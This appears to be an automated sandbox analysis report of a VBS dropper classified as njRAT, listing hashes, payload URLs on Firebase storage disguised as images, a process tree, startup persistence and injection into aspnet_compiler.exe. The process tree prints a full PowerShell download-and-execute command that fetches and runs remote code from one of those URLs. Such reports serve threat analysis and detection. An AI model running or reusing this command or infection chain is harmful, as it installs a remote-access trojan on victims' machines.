Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
02-05-2024 13:34
Static task
static1
Behavioral task
behavioral1
Sample
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
Resource
win7-20240220-en
General
-
Target
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
-
Size
271B
-
MD5
b9acaac18eee9b5cde0c6defbe2c1caa
-
SHA1
6f8cb34d61f9136e96345684846edf49dfa976bc
-
SHA256
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
-
SHA512
70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503
Extracted
njrat
0.7d
H
-
splitter
|'|'|
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 5 2976 powershell.exe 7 1932 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sCs.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1932 set thread context of 2292 1932 powershell.exe aspnet_compiler.exe -
Processes:
powershell.exepowershell.exepid process 2976 powershell.exe 1932 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2976 powershell.exe 2976 powershell.exe 2976 powershell.exe 1932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
powershell.exepowershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe Token: 33 2292 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2292 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exeWScript.exepowershell.exedescription pid process target process PID 2172 wrote to memory of 2976 2172 WScript.exe powershell.exe PID 2172 wrote to memory of 2976 2172 WScript.exe powershell.exe PID 2172 wrote to memory of 2976 2172 WScript.exe powershell.exe PID 2976 wrote to memory of 2392 2976 powershell.exe WScript.exe PID 2976 wrote to memory of 2392 2976 powershell.exe WScript.exe PID 2976 wrote to memory of 2392 2976 powershell.exe WScript.exe PID 2392 wrote to memory of 1932 2392 WScript.exe powershell.exe PID 2392 wrote to memory of 1932 2392 WScript.exe powershell.exe PID 2392 wrote to memory of 1932 2392 WScript.exe powershell.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe PID 1932 wrote to memory of 2292 1932 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps14⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD59553862ed1e00bd3e2b56370f296d36c
SHA1ee293e6e654d5d43a55183e56f27059100e2bd17
SHA25689c9a0fb1fae35b89bba64d15a913e333ab79977a89df34a812e3a735094d8fe
SHA5126a5593c6a933c20d52325c783ea5277ab47426f396250e14c530d25c7138770dde391c86562ce46482698e140ede84e59ea7dcc9304823eecc38ad568b34352c
-
C:\Users\Public\sCs.ps1Filesize
1KB
MD5e0e7ea9409eb39ae9d9e06ea8d2acd94
SHA13b8ab9de2c853a0238f3024eb8905ab81b8f634c
SHA25693b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
SHA51214cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f
-
C:\Users\Public\sCs.vbsFilesize
166B
MD5c3e1b2c797679d84c76dcdd5bb81db0d
SHA1f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
SHA256cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
SHA512be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c
-
memory/1932-27-0x0000000002A10000-0x0000000002A1C000-memory.dmpFilesize
48KB
-
memory/2292-30-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-28-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-32-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-34-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-36-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2292-37-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-38-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-39-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2976-16-0x000007FEF568E000-0x000007FEF568F000-memory.dmpFilesize
4KB
-
memory/2976-5-0x000000001B530000-0x000000001B812000-memory.dmpFilesize
2.9MB
-
memory/2976-6-0x0000000002290000-0x0000000002298000-memory.dmpFilesize
32KB
-
memory/2976-4-0x000007FEF568E000-0x000007FEF568F000-memory.dmpFilesize
4KB
-
memory/2976-7-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-20-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-8-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-9-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-15-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-11-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-10-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB